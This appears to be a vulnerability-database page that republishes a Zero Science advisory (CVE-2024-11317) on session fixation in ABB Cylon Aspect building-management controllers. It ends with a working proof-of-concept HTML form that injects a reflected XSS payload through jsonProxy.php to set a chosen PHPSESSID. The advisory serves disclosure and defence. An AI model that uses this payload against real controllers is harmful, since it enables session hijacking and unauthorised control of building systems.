ABB Cylon Aspect 3.08.02 PHP Session Fixation

🗓️ 10 Feb 2025 00:00:00Reported by LiquidWormType

packetstorm🔗 packetstorm.news👁 358 Views

ABB Cylon Aspect 3.08.02 is vulnerable to PHP session fixation and reflected XSS attacks.

Reporter	Title	Published	Views	Family All 14
0day.today	ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability	11 Feb 202500:00	–	zdt
BDU FSTEC	The vulnerability of microprogramming software in embedded network control controllers of ASPECT Enterprise, NEXUS Series, and MATRIX Series systems is related to improper session management. This vulnerability allows attackers to intercept user sessions and gain increased privileges.	6 Dec 202400:00	–	bdu_fstec
Circl	CVE-2024-11317	5 Dec 202412:52	–	circl
CNNVD	ABB ASPECT 安全漏洞	5 Dec 202400:00	–	cnnvd
CVE	CVE-2024-11317	5 Dec 202412:36	–	cve
Cvelist	CVE-2024-11317 PHP Session Fixation	5 Dec 202412:36	–	cvelist
Exploit DB	ABB Cylon Aspect 3.08.02 - PHP Session Fixation	11 Apr 202500:00	–	exploitdb
EUVD	EUVD-2024-34093	3 Oct 202520:07	–	euvd
NCSC	Vulnerabilities fixed in ABB ASPECT, NEXUS Series and MATRIX Series	6 Dec 202411:49	–	ncsc
NVD	CVE-2024-11317	5 Dec 202413:15	–	nvd

<html>
    <!--
    
    ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability
    
    
    Vendor: ABB Ltd.
    Product web page: https://www.global.abb
    Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                      Firmware: <=3.08.02
    
    Summary: ASPECT is an award-winning scalable building energy management
    and control solution designed to allow users seamless access to their
    building data through standard building protocols including smart devices.
    
    Desc: The ABB Cylon Aspect BMS/BAS controller is vulnerable to session
    fixation, allowing an attacker to set a predefined PHPSESSID value. An
    attacker can leverage an unauthenticated reflected XSS vulnerability in
    jsonProxy.php to inject a crafted request, forcing the victim to adopt
    a fixated session.
    
    Tested on: GNU/Linux 3.15.10 (armv7l)
               GNU/Linux 3.10.0 (x86_64)
               GNU/Linux 2.6.32 (x86_64)
               Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
               Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
               PHP/7.3.11
               PHP/5.6.30
               PHP/5.4.16
               PHP/4.4.8
               PHP/5.3.3
               AspectFT Automation Application Server
               lighttpd/1.4.32
               lighttpd/1.4.18
               Apache/2.2.15 (CentOS)
               OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
               OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
               ErgoTech MIX Deployment Server 2.0.0
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2025-5916
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5916.php
    CVE ID: CVE-2024-11317
    CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-11317
    
    
    21.04.2024
    
    -->
    
    
    
                     P   R   O   J   E   C   T
    
                            .|
                            | |
                            |'|            ._____
                    ___    |  |            |.   |' .---"|
            _    .-'   '-. |  |     .--'|  ||   | _|    |
         .-'|  _.|  |    ||   '-__  |   |  |    ||      |
         |' | |.    |    ||       | |   |  |    ||      |
     ____|  '-'     '    ""       '-'   '-.'    '`      |____
    ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
    ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
             ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
             ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
             ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                                   
    
    <body>
      <!-- Session ID in a cookie (Client-side script) OWASP Ref.: -->
      <form action="http://192.168.73.31/jsonProxy.php" method="GET">
        <input type="hidden" name="application" value="zeroscience" />
        <input type="hidden" name="query" value="<script>document.cookie="PHPSESSID=22222222225555555555111111; path=/"%0A%0Dwindow.location.href="/"</script>" />
        <input type="submit" value="Fix!" />
      </form>
    </body>
    </html>

10 Feb 2025 00:00Current

6.2Medium risk

Vulners AI Score6.2

CVSS 3.110

CVSS 49.3

EPSS0.00427

SSVC